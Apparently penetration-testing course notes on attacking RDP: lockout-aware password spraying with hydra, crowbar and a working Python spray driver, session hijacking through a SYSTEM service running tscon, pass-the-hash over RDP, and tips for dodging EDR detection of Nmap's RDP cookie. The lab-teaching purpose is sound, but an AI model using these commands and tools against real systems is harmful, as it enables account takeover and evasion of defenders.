RDP

TCP/UDP port 3389 (TCP carries the session; UDP 3389 is an optional transport added with RDP 8.0)


Initiate an RDP session

> sudo apt update && sudo apt install remmina remmina-plugin-rdp -y
> remmina

or xfreerdp (single-quote the password: an unquoted ! is subject to bash history expansion)

xfreerdp /v:<target IP> /u:htb-student /p:'HTB_@cademy_stdnt!'

Password Spraying Attack

Trying many passwords against one account will trip the account lockout threshold. Instead, try a single password against many usernames, which costs each account only one bad attempt per round. This is called password spraying. Check the lockout policy first (threshold and observation window, e.g. with net accounts /domain) and never exceed threshold - 1 attempts per account inside one window.

cat usernames.txt 

root
test
user
guest
admin
administrator

hydra:

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

crowbar:

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

2022-04-07 15:35:50 START
2022-04-07 15:35:50 Crowbar v0.4.1
2022-04-07 15:35:50 Trying 192.168.220.142:3389
2022-04-07 15:35:52 RDP-SUCCESS : 192.168.220.142:3389 - administrator:password123
2022-04-07 15:35:52 STOP
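The scheduling logic behind a safe spray, as an added example (this is not hydra or crowbar code). The RDP attempt is a pluggable callback so the pacing can be run and checked offline; `xfreerdp_login` is the real-world callback and assumes that FreeRDP's +auth-only mode exits with status 0 only when authentication succeeded. The lockout threshold and observation window defaults are assumptions; read the real policy with net accounts (or net accounts /domain) before using it.

```python
"""
Lockout-aware password spray driver (added example, not hydra/crowbar code).
The RDP attempt is a pluggable `try_login` so the scheduling can run offline;
`xfreerdp_login` is the real-world callback and assumes FreeRDP's +auth-only
mode returns exit status 0 only on successful authentication. Threshold and
window defaults are assumptions: read them from `net accounts /domain` first.
"""
import subprocess
import time
from typing import Callable, Iterable, List, Tuple


def xfreerdp_login(host: str) -> Callable[[str, str], bool]:
    """Build a try_login callback that checks one credential pair over RDP."""
    def attempt(user: str, password: str) -> bool:
        # +auth-only authenticates and disconnects without opening a desktop;
        # /cert:ignore suppresses the certificate prompt. Exit 0 == success (assumption).
        proc = subprocess.run(
            ["xfreerdp", f"/v:{host}", f"/u:{user}", f"/p:{password}", "+auth-only", "/cert:ignore"],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=30,
        )
        return proc.returncode == 0
    return attempt


def spray(users: Iterable[str], passwords: Iterable[str], try_login: Callable[[str, str], bool],
          lockout_threshold: int = 5, observation_window: float = 30 * 60,
          sleep: Callable[[float], None] = time.sleep,
          clock: Callable[[], float] = time.monotonic) -> List[Tuple[str, str]]:
    """Try each password against every user (password-major order) while keeping
    every account below the lockout threshold inside one observation window.

    Windows counts bad attempts per account and resets the counter once the
    observation window has passed, so lockout_threshold - 1 passwords per user
    per window is the most that can be tried without locking anyone out.
    `sleep` and `clock` are injectable so the pacing can be tested without waiting.
    """
    users = list(users)
    safe_per_window = lockout_threshold - 1
    if safe_per_window < 1:
        raise ValueError("lockout threshold leaves no room for a safe attempt")
    hits: List[Tuple[str, str]] = []
    found = set()
    window_start = clock()
    rounds_in_window = 0  # one round == one password tried against every user
    for password in passwords:
        if rounds_in_window >= safe_per_window:
            remaining = observation_window - (clock() - window_start)
            if remaining > 0:
                sleep(remaining)  # wait for the bad-password counters to reset
            window_start = clock()
            rounds_in_window = 0
        for user in users:
            if user in found:
                continue  # no need to keep hammering an account we already own
            if try_login(user, password):
                hits.append((user, password))
                found.add(user)
        rounds_in_window += 1
    return hits


# Constructed offline demo: a fake server on which only administrator:password123 is valid.
DEMO_USERS = ["root", "test", "user", "guest", "admin", "administrator"]
DEMO_PASSWORDS = ["Winter2024!", "Summer2024!", "password123", "Welcome1", "Spring2024!"]


def demo() -> dict:
    """Run the spray against the constructed fake server with a frozen clock."""
    calls: List[Tuple[str, str]] = []
    sleeps: List[float] = []

    def fake_login(user: str, password: str) -> bool:
        calls.append((user, password))
        return (user, password) == ("administrator", "password123")

    hits = spray(DEMO_USERS, DEMO_PASSWORDS, fake_login, lockout_threshold=3,
                 observation_window=1800.0, sleep=sleeps.append, clock=lambda: 0.0)
    return {"hits": hits, "attempts": len(calls), "sleeps": sleeps}


if __name__ == "__main__":
    print(demo())
```

With a threshold of 3 the driver pauses for the rest of the window after every two passwords, which is the behaviour to look for when validating any spray tool against the real policy: the number of bad attempts any single account sees inside one window must stay below the threshold.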

RDP Session Hijacking

Context: we are logged in as juurena, a local admin, and want to take over lewen's RDP session. The session IDs come from query user below: juurena is session 1 (rdp-tcp#13), lewen is session 2 (rdp-tcp#14). tscon works on the session ID, not the username.

tscon can attach another user's session to ours without their password only when it runs as SYSTEM; as a local admin it fails with an access-denied error.

To get from local admin to SYSTEM without extra tooling, create a Windows service with sc.exe (the Service Control utility): services run as LocalSystem by default, so whatever the service's binpath launches runs as SYSTEM.

C:\htb> query user

 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"

[SC] CreateService SUCCESS

2 is lewen's session ID and /dest: is our own SESSIONNAME (the space after binpath= is required by sc.exe's argument parser).
the format is:

tscon <TARGET_SESSION_ID> /dest:<OUR_SESSION_NAME>

Then run

C:\htb> net start sessionhijack

net start will eventually report that the service did not respond (error 1053, because cmd.exe never registers with the Service Control Manager), but tscon has already run by then and the desktop in our RDP window is now lewen's. Sessions in state Disc (disconnected) can be taken over the same way and are the usual target. Delete the service afterwards (sc.exe delete sessionhijack). Then enumerate lewen's privileges: with luck the user is a member of a Help Desk group with admin rights on many hosts, or even a Domain Admin.

RDP Pass the Hash (PtH)

Some applications can only be used through a GUI. If we only have a user's NT hash (e.g. dumped from the SAM, see Attacking SAM) and cannot crack it, Pass the Hash over RDP (xfreerdp's /pth: option) still gets us a session. This only works when Restricted Admin mode is enabled on the target (DisableRestrictedAdmin = 0 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); otherwise the logon is refused with "Account Restrictions are preventing this user from signing in."

see the RDP (Linux) section in PtH for the full procedure.

Nmap NSE

nmap nse -> nmap -sV -sC 10.129.201.248 -p3389 --script 'rdp*'
(quote the pattern so the shell does not glob it; it matches rdp-enum-encryption, rdp-ntlm-info and rdp-vuln-ms12-020)

  • with --packet-trace we can see the RDP cookie Nmap sends in its connection request (mstshash=nmap). That string is a well-known indicator: threat hunters and security services such as Endpoint Detection and Response (EDR) can flag it and lock us out on hardened networks, so on such targets prefer a client whose cookie looks like a real user name.
    nmap packet trace -> nmap -sV -sC 10.129.201.248 -p3389 --packet-trace --disable-arp-ping -n

RDP-sec-check

A Perl script, rdp-sec-check.pl, identifies the security settings of an RDP server without authenticating, from the protocol negotiation in the initial handshake (which security layers the server accepts: Standard RDP Security, TLS, or CredSSP/NLA).

to install (the script depends on the Encoding::BER Perl module):
> sudo cpan
cpan[1]> install Encoding::BER
> git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
> ./rdp-sec-check.pl 10.129.201.248
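What both rdp-sec-check and Nmap's rdp-enum-encryption are doing under the hood, as an added example serving the Nmap NSE and RDP-sec-check passages above (this is not code from either tool). It builds the X.224 Connection Request with the mstshash cookie that Nmap sends as mstshash=nmap, parses the server's Connection Confirm as MS-RDPBCGR defines it, and derives the same findings rdp-sec-check prints. The target host/port, the cookie user name and the sample responses are assumptions constructed for illustration.

```python
"""
RDP security-negotiation probe (added example; not Nmap's or rdp-sec-check's code).
Builds an X.224 Connection Request carrying an RDP Negotiation Request
(MS-RDPBCGR 2.2.1.1) and decodes the Connection Confirm (2.2.1.2). The sample
responses at the bottom are constructed, not captured from a real host.
"""
import socket
import struct
from typing import Dict, Optional

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x0         # "Standard RDP Security": RC4, no TLS, MITM-able
PROTOCOL_SSL = 0x1         # TLS
PROTOCOL_HYBRID = 0x2      # CredSSP, i.e. Network Level Authentication (NLA)
PROTOCOL_NAMES = {PROTOCOL_RDP: "RDP", PROTOCOL_SSL: "SSL", PROTOCOL_HYBRID: "HYBRID"}

# failureCode values of an RDP Negotiation Failure (MS-RDPBCGR 2.2.1.2.2)
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}
TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x02, 0x03


def build_connection_request(cookie_user: str, protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request + mstshash cookie + RDP Negotiation Request."""
    # mstsc puts the login user name in the cookie; Nmap hardcodes "nmap", which is
    # the string EDR rules key on. Sending a plausible user name removes that tell.
    cookie = f"Cookie: mstshash={cookie_user}\r\n".encode()
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, protocols)       # type, flags, length, requestedProtocols
    body = struct.pack(">BHHB", 0xE0, 0, 0, 0) + cookie + neg_req  # CR TPDU: code, dst-ref, src-ref, class 0
    x224 = struct.pack("B", len(body)) + body                       # LI counts the bytes after itself
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224          # TPKT: version 3, reserved, total length


def parse_connection_confirm(data: bytes) -> Dict[str, Optional[object]]:
    """Decode an X.224 Connection Confirm into {negotiates, selected, failure}."""
    if len(data) < 11 or data[0] != 3 or data[5] != 0xD0:
        raise ValueError("not a TPKT-framed X.224 Connection Confirm")
    if struct.unpack(">H", data[2:4])[0] > len(data):
        raise ValueError("truncated TPKT")
    if data[4] == 6:
        # No rdpNegRsp at all: the server predates negotiation and only does Standard RDP Security.
        return {"negotiates": False, "selected": PROTOCOL_RDP, "failure": None}
    ntype, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
    if ntype == TYPE_RDP_NEG_RSP:
        return {"negotiates": True, "selected": value, "failure": None}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"negotiates": True, "selected": None, "failure": FAILURE_CODES.get(value, f"UNKNOWN_{value}")}
    raise ValueError(f"unexpected negotiation type 0x{ntype:02x}")


def assess(answers: Dict[str, dict]) -> list:
    """Turn the three single-protocol answers into the findings rdp-sec-check reports."""
    findings = []
    if answers["RDP"]["selected"] == PROTOCOL_RDP:
        findings.append("Standard RDP Security accepted: no TLS, legacy RC4, vulnerable to MITM")
    if answers["SSL"]["selected"] == PROTOCOL_SSL:
        findings.append("TLS without NLA accepted: login screen reachable before authentication")
    if answers["HYBRID"]["selected"] == PROTOCOL_HYBRID:
        findings.append("CredSSP/NLA supported")
    if all(answers[p]["failure"] == "HYBRID_REQUIRED_BY_SERVER" for p in ("RDP", "SSL")):
        findings.append("NLA enforced")
    return findings


def probe(host: str, port: int = 3389, cookie_user: str = "Administrator", timeout: float = 5.0) -> Dict[str, dict]:
    """Ask for each protocol on its own (as rdp-sec-check does), so a server that
    would silently pick the strongest option of a combined request still reveals
    every layer it is willing to accept."""
    answers = {}
    for proto, name in PROTOCOL_NAMES.items():
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_connection_request(cookie_user, proto))
            answers[name] = parse_connection_confirm(s.recv(1024))
    return answers


# Constructed Connection Confirms (not captured from a real host) for offline use.
SAMPLE_NLA_ENFORCED = {
    "RDP": bytes.fromhex("030000130ed000000000000300080005000000"),     # failure: HYBRID_REQUIRED_BY_SERVER
    "SSL": bytes.fromhex("030000130ed000000000000300080005000000"),
    "HYBRID": bytes.fromhex("030000130ed000000000000200080002000000"),  # selectedProtocol = HYBRID
}
SAMPLE_LEGACY = {name: bytes.fromhex("0300000b06d00000000000") for name in PROTOCOL_NAMES.values()}  # LI=6: no negotiation


def assess_samples(samples: Dict[str, bytes]) -> list:
    """Parse a dict of raw Connection Confirms and assess them."""
    return assess({name: parse_connection_confirm(raw) for name, raw in samples.items()})


if __name__ == "__main__":
    import sys
    answers = probe(sys.argv[1]) if len(sys.argv) > 1 else \
        {n: parse_connection_confirm(r) for n, r in SAMPLE_NLA_ENFORCED.items()}
    for line in assess(answers):
        print(line)
```

Running it with a host argument performs the three live probes; without one it assesses the constructed samples. Sending one protocol per connection is the important design choice: a server that is asked for RDP|SSL|HYBRID at once simply answers with its preferred layer and tells you nothing about whether the weaker ones are still accepted.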

RDP General Information

For RDP session to be established, both the network firewall and the firewall on the server must allow connections from outside. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. In addition, port forwarding must be set up on the NAT router in the direction of the server.

RDP has supported TLS (and, via CredSSP, Network Level Authentication) since Windows Vista / Server 2008, but many Windows systems still accept the legacy "Standard RDP Security" layer with its weak RC4-based encryption. That is exactly the setting rdp-sec-check and Nmap's rdp-enum-encryption report on, and it is what makes a man-in-the-middle of the session feasible.